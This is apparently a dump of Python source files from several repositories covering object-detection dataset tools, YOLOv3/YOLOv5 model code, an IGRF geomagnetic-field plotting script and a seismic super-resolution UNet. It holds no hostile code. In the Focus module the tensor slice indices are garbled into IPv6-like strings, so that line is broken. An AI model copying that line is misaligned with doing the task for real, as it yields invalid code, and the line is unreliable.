"""合并pickle. 图片、新pickle会合并到第一个中. (no$, 未测试, 可能存在bug)
:param processor_list: List[Processor]. 不包括self
:param old_pkl_fname_list: List[str]
:param new_pkl_fname: str = "images_targets_concat.pkl".
:param prefix_list: List[str]
"""
# 1. 输入处理
processor_list.insert(0, self)
new_pkl_fname = new_pkl_fname or "images_targets_concat.pkl"
new_pkl_path = os.path.join(self.pkl_dir, new_pkl_fname)
if not self.exist_ok and os.path.exists(new_pkl_path):
raise FileExistsError("%s is exists" % new_pkl_path)
if prefix_list is None:
prefix_list = []
for i in range(len(processor_list)):
prefix_list.append("_" * i)
# ------------------------------------------
old_pkl_path_list, old_images_dir_list = [], []
for i, processor in enumerate(processor_list):
old_images_dir_list.append(processor.images_dir)
old_pkl_path_list.append(os.path.join(processor.pkl_dir, old_pkl_fname_list[i]))
new_images_dir = old_images_dir_list[0]
new_image_fname_list, new_target_list = [], []
for old_images_dir, old_pkl_path, prefix in \
zip(old_images_dir_list, old_pkl_path_list, prefix_list):
old_image_fname_list, old_target_list = load_from_pickle(old_pkl_path)
# 1. 修改target_list
new_target_list += old_target_list
# 2. 移动图片. 修改image_fname_list
for i, image_fname in enumerate(old_image_fname_list):
# 修改image_fname_list
new_image_fname = prefix + image_fname
new_image_fname_list.append(new_image_fname)
# 移动图片
if prefix != "":
old_path = os.path.join(old_images_dir, image_fname)
new_path = os.path.join(new_images_dir, new_image_fname)
shutil.copyfile(old_path, new_path)
print("\r>> %d / %d" % (i + 1, len(old_image_fname_list)), end="")
print()
# 3. 保存
save_to_pickle((new_image_fname_list, new_target_list), new_pkl_path)
print("-------------------------------------------------")
print("Concat:")
self.test_dataset(new_pkl_fname)
def _get_data_from_xml(self, xml_fname):
"""get img_fname, target from xml. 并检测图片已经存在
:param xml_fname: str
:return: tuple(img_fname, target: dict("boxes": Tensor[NUM, 4], "labels": Tensor[NUM]))"""
images_dir = self.images_dir
annos_dir = self.annos_dir
category = self.category
# 1. 获取文件名
image_fname = xml_fname.replace(".xml", ".jpg")
image_path = os.path.join(images_dir, image_fname)
anno_path = os.path.join(annos_dir, xml_fname)
# 2. 检测图片存在
if not os.path.exists(image_path): # 图片不存在
raise FileNotFoundError("%s not found" % image_path)
# 3. 获取ann数据
with open(anno_path, "r", encoding="utf-8") as f:
text = f.read()
data_list = re.findall( # len(NUMi, 5(object_name, left, top, right, bottom))
r"<name>\s*(\w*?)\s*</name>.*?"
r"<xmin>\s*(\d*?)\s*</xmin>.*?<ymin>\s*(\d*?)\s*</ymin>.*?"
r"<xmax>\s*(\d*?)\s*</xmax>.*?<ymax>\s*(\d*?)\s*</ymax>",
text, re.DOTALL)
if len(data_list) == 0: # 没有框
print("| no target in %s. but we still put it in" % image_fname)
# 4. 处理数据
box_list, label_list = [], [] # len(NUMi, 4), len(NUMi)
for object_name, left, top, right, bottom in data_list:
label = category.get(object_name) # object_name 是否存在于 category中. label: int
if label is None: # 目标名不在category中
raise ValueError("`%s` not in category. path: %s" % (object_name, anno_path))
if label == -1:
continue
box_list.append([int(left), int(top), int(right), int(bottom)]) # int() 不需要担心 str存在空格
label_list.append(label)
# 5. 数据类型转换
target = {
"boxes": torch.tensor(box_list, dtype=torch.float32).reshape(-1, 4),
"labels": torch.tensor(label_list, dtype=torch.long).reshape(-1)
}
return image_fname, target
def split_train_test_from_pickle(self, total_pkl_fname, test_num=1000,
train_pkl_fname=None, test_pkl_fname=None):
"""将pickle分为训练集和测试集
:param total_pkl_fname: str
:param test_num: int. 测试集数量(图片张数)
:param train_pkl_fname: str = "images_targets_train.pkl"
:param test_pkl_fname: str = "images_targets_test.pkl"
:return: None
"""
train_pkl_fname = train_pkl_fname or "images_targets_train.pkl"
test_pkl_fname = test_pkl_fname or "images_targets_test.pkl"
total_pkl_path = os.path.join(self.pkl_dir, total_pkl_fname)
train_pkl_path = os.path.join(self.pkl_dir, train_pkl_fname)
test_pkl_path = os.path.join(self.pkl_dir, test_pkl_fname)
if not self.exist_ok and (os.path.exists(train_pkl_path) or os.path.exists(test_pkl_path)):
raise FileExistsError("%s or %s is exists" % (train_pkl_path, test_pkl_path))
total_image_fname_list, total_target_list = load_from_pickle(total_pkl_path)
# 乱序处理
total_image_fname_list = np.stack(total_image_fname_list, 0)
total_target_fname_list = np.stack(total_target_list, 0)
shuffle_order = np.random.permutation(len(total_image_fname_list))
train_order = shuffle_order[:-test_num]
test_order = shuffle_order[-test_num:]
# 3. 分开
# 训练集
train_image_fname_list = list(total_image_fname_list[train_order])
train_target_list = list(total_target_fname_list[train_order])
# 测试集
test_image_fname_list = list(total_image_fname_list[test_order])
test_target_list = list(total_target_fname_list[test_order])
save_to_pickle((train_image_fname_list, train_target_list), train_pkl_path)
save_to_pickle((test_image_fname_list, test_target_list), test_pkl_path)
print("-------------------------------------------------")
print("Train:")
self.test_dataset(train_pkl_fname)
print("-------------------------------------------------")
print("Test:")
self.test_dataset(test_pkl_fname)
def make_mini_dataset(self, total_pkl_fname, dataset_num=1000, mini_pkl_fname=None):
"""制作小数据集
:param total_pkl_fname: str
:param dataset_num: int. 数据集数量(图片张数)
:param mini_pkl_fname: str = "images_targets_mini.pkl"
:return: None
"""
mini_pkl_fname = mini_pkl_fname or "images_targets_mini.pkl"
total_pkl_path = os.path.join(self.pkl_dir, total_pkl_fname)
mini_pkl_path = os.path.join(self.pkl_dir, mini_pkl_fname)
if not self.exist_ok and os.path.exists(mini_pkl_path):
raise FileExistsError("%s is exists" % mini_pkl_path)
total_image_fname_list, total_target_list = load_from_pickle(total_pkl_path)
# 乱序处理
total_image_fname_list = np.stack(total_image_fname_list, 0)
total_target_fname_list = np.stack(total_target_list, 0)
shuffle_order = np.random.permutation(len(total_image_fname_list))
mini_order = shuffle_order[:dataset_num]
# 3. 分开
# mini集
mini_image_fname_list = list(total_image_fname_list[mini_order])
mini_target_list = list(total_target_fname_list[mini_order])
save_to_pickle((mini_image_fname_list, mini_target_list), mini_pkl_path)
print("-------------------------------------------------")
print("Mini:")
self.test_dataset(mini_pkl_fname)
def hflip_from_pickle(self, old_pkl_fname, new_pkl_fname=None, prefix="-"):
"""将images, 以及pickle进行水平翻转
:param old_pkl_fname: str
:param new_pkl_fname: str = "images_targets_hflip.pkl".
:param prefix: str. 加上前缀
:return: None
"""
new_pkl_fname = new_pkl_fname or "images_targets_hflip.pkl"
old_pkl_path = os.path.join(self.pkl_dir, old_pkl_fname)
new_pkl_path = os.path.join(self.pkl_dir, new_pkl_fname)
if not self.exist_ok and os.path.exists(new_pkl_path):
raise FileExistsError("%s is exists" % new_pkl_path)
image_fname_list, target_list = load_from_pickle(old_pkl_path) # 直接加入
image_fname_len = len(image_fname_list) # 原来的长度
for i in range(image_fname_len):
image_fname, target = image_fname_list[i], target_list[i]
old_path = os.path.join(self.images_dir, image_fname)
new_image_fname = prefix + image_fname
new_path = os.path.join(self.images_dir, new_image_fname)
with Image.open(old_path) as image:
image, target = hflip_image(image, target) # 翻转图片
if not self.exist_ok and os.path.exists(new_path):
raise FileExistsError("%s is exists" % new_path)
image.save(new_path)
image_fname_list.append(new_image_fname)
target_list.append(target)
print("\r>> %d / %d" % (i + 1, image_fname_len), end="")
print()
# 3. 保存
save_to_pickle((image_fname_list, target_list), new_pkl_path)
print("-------------------------------------------------")
print("HFlip:")
self.test_dataset(new_pkl_fname)
``` |
{
"source": "Jintao-Huang/torch_study",
"score": 3
} |
#### File: dev/torch/corrcoef.py
```python
import torch
from torch import Tensor
from . import cov
def corrcoef(input: Tensor) -> Tensor:
"""
:param input: shape[N, M]
:return: shape[N, N]. 对称矩阵. 对角线为1
"""
x_cov = cov(input) # [N, N]
x_std = torch.sqrt(torch.diag(x_cov)) # [N]
x_corr = x_cov / (x_std[:, None] * x_std[None])
return x_corr
```
#### File: nn/functional/linear.py
```python
import torch
from torch import Tensor
"""
- 矩阵乘时间复杂度: e.g. [A, B] @ [B, C]. Ot(ABC)
- linear时间复杂度: Ot(N*In*Out)
"""
def linear(input: Tensor, weight: Tensor, bias: Tensor = None) -> Tensor:
"""
:param input: shape[N, In]
:param weight: shape[Out, In]
:param bias: shape[Out]
:return: shape[N, Out]"""
x = input
#
y = x @ weight.T # Ot(N*In*Out)
if bias is not None:
y += bias # Ot(N*Out)
return y
``` |
{
"source": "Jintao-Huang/YOLOv3_PyTorch",
"score": 2
} |
#### File: YOLOv3_PyTorch/models/backbone.py
```python
import torch
from .utils import IntermediateLayerGetter
from .darknet53 import darknet53
import torch.nn as nn
from collections import OrderedDict
from .fpn import FPN
class Darknet53WithFPN(nn.Sequential):
def __init__(self, pretrained_backbone, out_anchors, num_classes, backbone_norm_layer, fpn_norm_layer):
backbone = darknet53(pretrained_backbone, norm_layer=backbone_norm_layer)
return_layers = {"layer3": "P3", "layer4": "P4", "layer5": "P5"}
in_channels_list = (256, 512, 1024) # P3 P4 P5
super(Darknet53WithFPN, self).__init__(OrderedDict({
"body": IntermediateLayerGetter(backbone, return_layers),
"fpn": FPN(in_channels_list, out_anchors, num_classes, fpn_norm_layer)
}))
``` |
{
"source": "Jintao-Huang/yolov5_PyTorch",
"score": 2
} |
#### File: Jintao-Huang/yolov5_PyTorch/make_dataset.py
```python
from utils.detection.xml_processor import XMLProcessor
from utils.utils import load_from_pickle, save_to_pickle
import os
def make_dataset(imgs_dir, annos_dir, pkl_path, imgs_set_path, labels="voc", show_dataset=False):
"""
:param imgs_dir: str
:param annos_dir: str
:param pkl_path: str
:param imgs_set_path: str
:param labels: str["coco", "voc"] or list[str] or Dict[str: int] 可多对一
:param show_dataset: bool
:return:
"""
pkl_dir = os.path.dirname(pkl_path)
os.makedirs(pkl_dir, exist_ok=True)
xml_processor = XMLProcessor(imgs_dir, annos_dir, labels, imgs_set_path, True)
if os.path.exists(pkl_path):
img_path_list, target_list = load_from_pickle(pkl_path)
xml_processor.img_path_list, xml_processor.target_list = img_path_list, target_list
xml_processor.test_dataset()
else:
xml_processor.create_labels_cache()
xml_processor.test_dataset()
save_to_pickle((xml_processor.img_path_list, xml_processor.target_list), pkl_path)
img_path_list, target_list = xml_processor.img_path_list, xml_processor.target_list
if show_dataset:
xml_processor.show_dataset()
return img_path_list, target_list
if __name__ == "__main__":
make_dataset(r"D:\datasets\VOCdevkit\VOC0712\JPEGImages",
r"D:\datasets\VOCdevkit\VOC0712\Annotations",
r"D:\datasets\VOCdevkit\VOC0712\pkl\voc_0712_test.pkl",
r"D:\datasets\VOCdevkit\VOC0712\ImageSets\Main\test.txt", "voc", True)
make_dataset(r"D:\datasets\VOCdevkit\VOC0712\JPEGImages",
r"D:\datasets\VOCdevkit\VOC0712\Annotations",
r"D:\datasets\VOCdevkit\VOC0712\pkl\voc_0712_trainval.pkl",
r"D:\datasets\VOCdevkit\VOC0712\ImageSets\Main\trainval.txt", "voc", True)
```
#### File: yolov5_PyTorch/models/backbone.py
```python
import torch.nn as nn
from .common import Focus, ConvBnSiLU, C3, SPP
__all__ = ["YOLOv5Backbone"]
class YOLOv5Backbone(nn.Module):
def __init__(self):
super(YOLOv5Backbone, self).__init__()
self.layer1 = Focus(3, 32, 3, 1, 1) # 0
self.layer2 = nn.Sequential(
ConvBnSiLU(32, 64, 3, 2, 1, True), # 1
C3(64, 64, 1, True, 0.5) # 2
)
self.layer3 = nn.Sequential(
ConvBnSiLU(64, 128, 3, 2, 1, True), # 3
C3(128, 128, 3, True, 0.5) # 4
)
self.layer4 = nn.Sequential(
ConvBnSiLU(128, 256, 3, 2, 1, True), # 5
C3(256, 256, 3, True, 0.5) # 6
)
self.layer5 = nn.Sequential(
ConvBnSiLU(256, 512, 3, 2, 1, True), # 7
SPP(512, 512, (5, 9, 13)), # 8
C3(512, 512, 1, False, 0.5) # 9
)
def forward(self, x):
output = []
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
output.append(x)
x = self.layer4(x)
output.append(x)
x = self.layer5(x)
output.append(x)
return output # [x_3, x_4, x_5]
```
#### File: yolov5_PyTorch/models/common.py
```python
import torch.nn as nn
import torch
class ConvBnSiLU(nn.Module):
# Standard convolution
def __init__(self, in_channels, out_channels,
kernel_size, stride, padding, activation=True):
super(ConvBnSiLU, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, bias=False)
self.bn = nn.BatchNorm2d(out_channels, 1e-3, 0.03)
self.act = nn.SiLU(inplace=True) if activation else nn.Identity()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.act(x)
return x
def fuse_forward(self, x):
x = self.conv(x)
x = self.act(x)
return x
class Bottleneck(nn.Module):
# Standard bottleneck
def __init__(self, in_channels, out_channels, shortcut=True, expansion=0.5):
super(Bottleneck, self).__init__()
neck = int(out_channels * expansion)
self.conv1 = ConvBnSiLU(in_channels, neck, 1, 1, 0, True)
self.conv2 = ConvBnSiLU(neck, out_channels, 3, 1, 1, True)
self.shortcut = shortcut and in_channels == out_channels
def forward(self, x):
x0 = x
x = self.conv1(x)
x = self.conv2(x)
x = (x0 + x) if self.shortcut else x
return x
class C3(nn.Module):
# CSP Bottleneck with 3 convolutions
def __init__(self, in_channels, out_channels, repeat=1, shortcut=True, expansion=0.5):
super(C3, self).__init__()
neck = int(out_channels * expansion)
self.conv1 = ConvBnSiLU(in_channels, neck, 1, 1, 0, True)
self.conv2 = ConvBnSiLU(in_channels, neck, 1, 1, 0, True)
self.bottleneck_n = nn.Sequential(*[Bottleneck(neck, neck, shortcut, 1.0) for _ in range(repeat)])
self.conv3 = ConvBnSiLU(2 * neck, out_channels, 1, 1, 0, True)
def forward(self, x):
x1 = self.conv1(x)
x1 = self.bottleneck_n(x1)
x2 = self.conv2(x)
x = torch.cat([x1, x2], dim=1)
x = self.conv3(x)
return x
class SPP(nn.Module):
# Spatial pyramid pooling layer used in YOLOv3-SPP
def __init__(self, in_channels, out_channels, kernel_size_list=(5, 9, 13)):
super(SPP, self).__init__()
neck = in_channels // 2
self.conv1 = ConvBnSiLU(in_channels, neck, 1, 1, 0)
self.conv2 = ConvBnSiLU(neck * (len(kernel_size_list) + 1), out_channels, 1, 1, 0)
self.max_pool_list = nn.ModuleList(
[nn.MaxPool2d(kernel_size, 1, kernel_size // 2) for kernel_size in kernel_size_list])
def forward(self, x):
x = self.conv1(x)
x0 = x
x = [max_pool(x) for max_pool in self.max_pool_list]
x = torch.cat([x0] + x, 1)
x = self.conv2(x)
return x
class Focus(nn.Module):
# Focus wh information into c-space
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, activation=True):
super(Focus, self).__init__()
self.conv = ConvBnSiLU(in_channels * 4, out_channels, kernel_size, stride, padding, activation)
def forward(self, x):
x = torch.cat([x[:, :, fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b, ::2], x[:, :, fdf8:f53e:61e4::18, ::2], x[:, :, fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b, 1::2], x[:, :, fdf8:f53e:61e4::18, 1::2]], 1)
x = self.conv(x)
return x
class Concat(nn.Module):
# Concatenate a list of tensors along dimension
def __init__(self, dim=1):
super(Concat, self).__init__()
self.dim = dim
def forward(self, x):
return torch.cat(x, self.dim)
```
#### File: yolov5_PyTorch/models/fpn.py
```python
import torch.nn as nn
from .common import Concat, ConvBnSiLU, C3
__all__ = ["PANet"]
class PANet(nn.Module):
def __init__(self):
super(PANet, self).__init__()
self.conv_list = nn.ModuleList([
ConvBnSiLU(512, 256, 1, 1, 0, True), # 10
ConvBnSiLU(256, 128, 1, 1, 0, True), # 14
])
# 为了保持模型结构不进行合并写
self.up_list = nn.ModuleList([
nn.Upsample(scale_factor=2., mode="nearest"), # 11
nn.Upsample(scale_factor=2., mode="nearest") # 15
])
self.down_list = nn.ModuleList([
ConvBnSiLU(128, 128, 3, 2, 1, True), # 18
ConvBnSiLU(256, 256, 3, 2, 1, True) # 21
])
self.cat_list = nn.ModuleList([
Concat(1), # 12
Concat(1), # 16
Concat(1), # 19
Concat(1) # 22
])
self.C3_list = nn.ModuleList([
C3(512, 256, 1, False, 0.5), # 13
C3(256, 128, 1, False, 0.5), # 17
C3(256, 256, 1, False, 0.5), # 20
C3(512, 512, 1, False, 0.5) # 23
])
def forward(self, x):
x_3, x_4, x_5 = x
x_5 = self.conv_list[0](x_5)
x_4 = self.cat_list[0]([self.up_list[0](x_5), x_4])
x_4 = self.conv_list[1](self.C3_list[0](x_4))
x_3 = self.cat_list[1]([self.up_list[1](x_4), x_3])
x_3 = self.C3_list[1](x_3)
x_4 = self.cat_list[2]([self.down_list[0](x_3), x_4])
x_4 = self.C3_list[2](x_4)
x_5 = self.cat_list[3]([self.down_list[1](x_4), x_5])
x_5 = self.C3_list[3](x_5)
return x_3, x_4, x_5
```
#### File: utils/detection/tester.py
```python
from torch.utils.data import DataLoader
import torch
import math
class Tester:
def __init__(self, model, test_dataset, batch_size, device, ap_counter, test_samples=1000,
score_thresh=0.5, nms_thresh=0.5):
self.model = model.to(device)
self.test_loader = DataLoader(test_dataset, batch_size, True, collate_fn=collate_fn, pin_memory=True)
self.device = device
self.num_samples = len(test_dataset)
self.batch_size = batch_size
self.ap_counter = ap_counter
self.test_step = math.ceil(test_samples / batch_size)
self.score_thresh = score_thresh
self.nms_thresh = nms_thresh
def test(self, total=False):
self.model.eval()
self.ap_counter.init_table()
with torch.no_grad():
for i, (x, y) in enumerate(self.test_loader):
x, y = to(x, y, self.device)
pred = self.model(x, score_thresh=self.score_thresh, nms_thresh=self.nms_thresh)
self.ap_counter.add(pred, y)
if not total and i + 1 == self.test_step:
break
ap_dict = self.ap_counter.get_ap_dict()
self._print_mes(i + 1, ap_dict)
self.ap_counter.init_table() # clear memory
return ap_dict
def _print_mes(self, steps, ap_dict):
test_num_samples = min(steps * self.batch_size, self.num_samples)
print("Test | Samples: %d/%d (%.2f%%)" %
(test_num_samples, self.num_samples,
test_num_samples / self.num_samples * 100))
self.ap_counter.print_ap(ap_dict)
```
#### File: utils/detection/xml_processor.py
```python
import os
import numpy as np
import cv2 as cv
from ..display import imread, draw_target_in_image, resize_max, coco_labels, voc_labels
import xml.etree.ElementTree as ET
from models.utils import ltrb2cxcywh, cxcywh2ltrb
from copy import deepcopy
class XMLProcessor:
"""$"""
def __init__(self, imgs_dir, annos_dir, labels="voc", imgs_set_path=None, verbose=True):
"""
:param imgs_dir: str
:param annos_dir: str
:param labels: str["coco", "voc"] or list[str] or Dict[str: int] 可多对一
:param imgs_set_path: str. txt文件, 内含图片的集合
"""
self.imgs_dir = imgs_dir
self.annos_dir = annos_dir
self.imgs_set_path = imgs_set_path
if labels == "voc":
labels = voc_labels
elif labels == "coco":
labels = coco_labels
if isinstance(labels, list):
labels = dict(zip(labels, range(len(labels))))
self.labels_str2int = labels
self.labels_int2str = dict(zip(labels.values(), labels.keys())) # 只有v < 0 忽略
self.img_path_list = [] # List[str]
# List[ndarray[X, 5], Tuple[W, H]]. [cls, *xywh]
self.target_list = []
self.verbose = verbose
def create_labels_cache(self):
"""解析xmls.
:return: None. 缓存见self.img_path_list, self.target_list
"""
print("create labels cache...")
img_path_list = [] # List[str]
target_list = [] # List[ndarray[X, 5], Tuple[W, H]]. [cls, *xywh]
if self.imgs_set_path:
with open(self.imgs_set_path, "r") as f:
annos_fname_list = ["%s.xml" % x.rstrip('\n') for x in f]
else:
annos_fname_list = os.listdir(self.annos_dir)
annos_path_list = [os.path.join(self.annos_dir, fname) for fname in annos_fname_list]
for i, annos_path in enumerate(annos_path_list):
img_path, target = self._get_data_from_xml(annos_path)
img_path_list.append(os.path.join(self.imgs_dir, img_path))
target_list.append(target)
self.img_path_list = img_path_list
self.target_list = target_list
def _get_data_from_xml(self, anno_path):
"""get img_path, target from xml.
检查: (图片文件存在, 每张图片至少一个目标, 目标名在labels中.)
:param anno_path: str
:return: Tuple[img_path, target: List[ndarray[X, 5], Tuple[W, H]]. [cls, *xywh]]"""
# 1. 获取文件名
img_path = os.path.join(self.imgs_dir, os.path.basename(anno_path).replace(".xml", ".jpg"))
# 2. 检测图片存在
img = cv.imread(img_path)
w, h = img.shape[1], img.shape[0]
assert img is not None, "image not found. path: %s" % img_path
# 3. 获取ann数据
with open(anno_path, "r", encoding="utf-8") as f:
text = f.read()
# [cls, *xywh]
xml_tree = ET.parse(anno_path)
data_list = list(zip(
xml_tree.findall(".//object/name"),
xml_tree.findall(".//object/bndbox/xmin"),
xml_tree.findall(".//object/bndbox/ymin"),
xml_tree.findall(".//object/bndbox/xmax"),
xml_tree.findall(".//object/bndbox/ymax"),
))
if len(data_list) == 0: # 没有框
print("| no target. but we still put it in. path: %s" % img_path) if self.verbose else None
# 4. 处理数据
target_list = [] # len(NUMi, 4), len(NUMi)
for obj_name, left, top, right, bottom in data_list:
label = self.labels_str2int.get(obj_name.text) # obj_name 是否存在于labels中. label: int
if label is None: # 目标名不在labels中
print("`%s` not in labels. path: %s" % (obj_name, anno_path)) if self.verbose else None
continue
if label == -1:
continue
target_list.append([label, int(left.text), int(top.text), int(right.text), int(bottom.text)])
# 5. 数据类型转换. target归一化
target = np.array(target_list, dtype=np.float32) # [X, 4]
target[:, 1:] = ltrb2cxcywh(target[:, 1:])
target[:, 1::2] /= w # lr
target[:, 2::2] /= h # tb
target = [target, (w, h)]
return img_path, target
def test_dataset(self):
"""测试pickle文件(输出总图片数、各个分类的目标数).
:return: None
"""
print("-------------------------------------------------")
print("imgs数量: %d" % len(self.img_path_list))
print("targets数量: %d" % len(self.target_list))
# 获取target各个类的数目
# 1. 初始化classes_num_dict
classes_num_dict = {label_name: 0 for label_name in self.labels_int2str.values()}
# 2. 累加
for target in self.target_list: # 遍历每一张图片
for label in target[0][:, 0]:
classes_num_dict[self.labels_int2str[int(label)]] += 1
# 3. 打印
print("classes_num:")
for obj_name, value in classes_num_dict.items():
print("\t%s: %d" % (obj_name, value))
print("\tAll: %d" % sum(classes_num_dict.values()), flush=True)
def show_dataset(self, random=False, colors=None):
"""展示数据集,一张张展示
:param random: bool
:param colors: Dict / List
:return: None
"""
target_list = deepcopy(self.target_list)
if random:
orders = np.random.permutation(range(len(self.img_path_list)))
else:
orders = range(len(self.img_path_list))
for i in orders: # 随机打乱
# 1. 数据结构
img_path = self.img_path_list[i]
img_fname = os.path.basename(img_path)
target, (w, h) = target_list[i]
labels = target[:, 0]
boxes = target[:, 1:]
boxes = cxcywh2ltrb(boxes)
boxes[:, 0::2] *= w # lr
boxes[:, 1::2] *= h # tb
# 2. 打开图片
img = imread(img_path)
draw_target_in_image(img, boxes, labels, None, self.labels_int2str, colors)
img = resize_max(img, 720, 1080)
cv.imshow("%s" % img_fname, img)
cv.waitKey(0)
cv.destroyWindow("%s" % img_fname)
```
#### File: yolov5_PyTorch/utils/utils.py
```python
import pickle
import hashlib
import torch
import numpy as np
from torch.backends import cudnn
def save_to_pickle(data, filepath):
"""$"""
with open(filepath, "wb") as f:
pickle.dump(data, f)
def load_from_pickle(filepath):
"""$"""
with open(filepath, "rb") as f:
obj = pickle.load(f)
return obj
def calculate_hash(filepath):
with open(filepath, "rb") as f:
buffer = f.read()
sha256 = hashlib.sha256()
sha256.update(buffer)
digest = sha256.hexdigest()
return digest[:8]
def set_seed(seed=0):
"""网络重现"""
torch.manual_seed(seed)
np.random.seed(seed)
# 取消cudnn加速时的省略精度产生的随机性
cudnn.deterministic = True
# cudnn.benchmark = True # if benchmark == True, deterministic will be False
def save_params(model, filepath):
torch.save(model.state_dict(), filepath)
def load_params(model, filepath, prefix="", drop_layers=(), strict=True):
"""
:param model: 变
:param filepath: str
:param prefix: 在pth的state_dict加上前缀. e.g. "backbone."
:param drop_layers: 对加完前缀后的pth进行剔除. e.g. "head"
:param strict: bool
"""
load_state_dict = torch.load(filepath)
# 1. 加前缀
if prefix:
for key in list(load_state_dict.keys()):
load_state_dict[prefix + key] = load_state_dict.pop(key)
# 2. drop
for key in list(load_state_dict.keys()):
for layer in drop_layers:
if layer in key:
load_state_dict.pop(key)
break
return model.load_state_dict(load_state_dict, strict)
def load_params_by_order(model, filepath, strict=True):
"""The parameter name of the pre-training model is different from the parameter name of the model"""
load_state_dict = torch.load(filepath)
# --------------------- 算法
load_keys = list(load_state_dict.keys())
model_keys = list(model.state_dict().keys())
assert len(load_keys) == len(model_keys)
# by order
for load_key, model_key in zip(load_keys, model_keys):
load_state_dict[model_key] = load_state_dict.pop(load_key)
return model.load_state_dict(load_state_dict, strict)
``` |
{
"source": "JintaoLee-Roger/IGRF",
"score": 2
} |
#### File: JintaoLee-Roger/IGRF/igrfcode.py
```python
from constant import *
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
import scipy.special as scp
from pathlib import Path
import imageio
import os
import os.path
class IGRF:
def readdata(self, filename):
# 读取数据
G = []
n = []
m = []
data = np.zeros((195, 25))
with open(filename) as f:
lines = f.readlines()
i = 0
for line in lines:
lineData = line.strip().split()
G.append(lineData[0])
n.append(int(lineData[1]))
m.append(int(lineData[2]))
data[i,:] = lineData[3:]
i = i + 1
g = np.zeros(N1)
for i in range(N1):
g[i] = 0 if G[i] == 'g' else np.pi/2
return g, n, m, data
def V(self, g, n, m, data):
# 计算非偶极子场
ans = np.zeros(shapex)
for i in range(N2):
for j in range(N1):
if n[j] == 1:
# 去掉偶极子场
continue
e = 1 if m[j] == 0 else 2
ans[:,:,i] = ans[:,:,i] - (-1)**(m[j])*(n[j]+1) * data[j,i]*np.cos(m[j]*Phi-g[j]) * \
(e * factorial(n[j]-m[j]) / factorial(n[j]+m[j]))**0.5 * \
(scp.lpmv(m[j], n[j], np.cos(Theta)))
ans.tofile('data.dat', sep = ' ', format = '%f')
def drawpicture(self, path, save = False):
# 画图
plt.ion()
# 读入生成的数据
result = np.fromfile('data.dat', dtype = float, sep = ' ').reshape(shapex)
# 画布大小
fig = plt.figure(figsize=(10,7))
ax1 = fig.add_axes([0.1,0.1,0.85,0.85])
for index in range(N2):
plt.cla()
plt.title('IGRF--'+str(1900+index*5))
# 绘制地图(世界地图)
map = Basemap(ax = ax1)
map.drawcoastlines()
map.drawparallels(np.arange(-90,90,20),labels=[1,0,0,1])
map.drawmeridians(np.arange(-180,180,30),labels=[1,0,0,1])
# 绘制等值线
X,Y = map(Phi, Theta)
map.contour(X*t, 90 - Y*t, result[:,:,index], 15)
# 将每年的非偶极子场的图保存
if save:
filename = 'IGRF--'+str(1900+index*5)+'.png'
plt.savefig(path+filename)
plt.pause(0.1)
plt.ioff()
plt.show()
def creategif(self, path, gif_name):
# 将png图片保存为gif动图
frames = []
pngFiles = os.listdir(path)
image_list = [os.path.join(path, f) for f in pngFiles]
for image_name in image_list:
# 读取 png 图像文件
frames.append(imageio.imread(image_name))
# 保存为 gif
imageio.mimsave(gif_name, frames, 'GIF', duration = 0.3)
if __name__ == '__main__':
g, n, m, data = IGRF().readdata('igrf12coeffs.txt')
file = Path('data.dat')
if not file.is_file():
# 计算一次,避免重复计算
IGRF().V(g, n, m, data)
path = 'D:/Learn/python/IGRF/pngfile/'
IGRF().drawpicture(path, save=True)
IGRF().creategif(path, 'IGRF.gif')
``` |
{
"source": "JintaoLee-Roger/SeismicSuperResolution",
"score": 3
} |
#### File: src/data/__init__.py
```python
from data import srdata
from torch.utils.data import dataloader
class Data:
def __init__(self, args):
self.loader_train = None
if not args.test_only:
train_set = srdata.SRData(args, train=True)
self.loader_train = dataloader.DataLoader(
train_set, batch_size=args.batch_size,
shuffle=True, pin_memory=not args.cpu,
num_workers=args.n_threads
)
test_set = srdata.SRData(args, train=False)
self.loader_test = dataloader.DataLoader(
test_set, batch_size=1,
shuffle=False, pin_memory=not args.cpu,
num_workers=args.n_threads
)
```
#### File: src/model/unet.py
```python
import torch.nn as nn
import torch
from model import common
def conv(in_f, out_f, kernel_size, stride=1, bias=True, pad='zero', downsample_mode='stride'):
downsampler = None
if stride != 1 and downsample_mode != 'stride':
if downsample_mode == 'avg':
downsampler = nn.AvgPool2d(stride, stride)
elif downsample_mode == 'max':
downsampler = nn.MaxPool2d(stride, stride)
else:
assert False
stride = 1
padder = None
to_pad = (kernel_size - 1) // 2
if pad == 'reflection':
padder = nn.ReflectionPad2d(to_pad)
to_pad = 0
convolver = nn.Conv2d(in_f, out_f, kernel_size, stride, padding=to_pad, bias=bias)
layers = filter(lambda x: x is not None, [padder, convolver, downsampler])
return nn.Sequential(*layers)
class ListModule(nn.Module):
def __init__(self, *args):
super(ListModule,self).__init__()
idx = 0
for module in args:
self.add_module(str(idx), module)
idx += 1
def __getitem__(self, idx):
if idx >= len(self._modules):
raise IndexError('index {} is out of range'.format(idx))
if idx < 0:
idx = len(self) + idx
it = iter(self._modules.values())
for i in range(idx):
next(it)
return next(it)
def __iter__(self):
return iter(self._modules.values())
def __len__(self):
return len(self._modules)
def make_model(args):
return UNet(feature_scale=args.feature_scale, scale=args.scale)
class UNet(nn.Module):
def __init__(self, n_input_channels=1, n_output_channels=1, feature_scale=1, more_layers=0,
concat_x=False, upsample_model='deconv', pad='zero', norm_layer=nn.BatchNorm2d,
need_bias=True, scale=2):
super(UNet, self).__init__()
self.feature_scale = feature_scale
self.more_layers = more_layers
self.concat_x = concat_x
features = [64, 128, 256, 512, 1024]
features = [x // self.feature_scale for x in features]
self.start = unetConv2d(n_input_channels,
features[0] if not self.concat_x else features[0] - n_input_channels,
norm_layer, need_bias, pad)
self.down1 = unetDown(features[0], features[1] if not self.concat_x else features[1] - n_input_channels,
norm_layer, need_bias, pad)
self.down2 = unetDown(features[1], features[2] if not self.concat_x else features[2] - n_input_channels,
norm_layer, need_bias, pad)
self.down3 = unetDown(features[2], features[3] if not self.concat_x else features[3] - n_input_channels,
norm_layer, need_bias, pad)
self.down4 = unetDown(features[3], features[4] if not self.concat_x else features[4] - n_input_channels,
norm_layer, need_bias, pad)
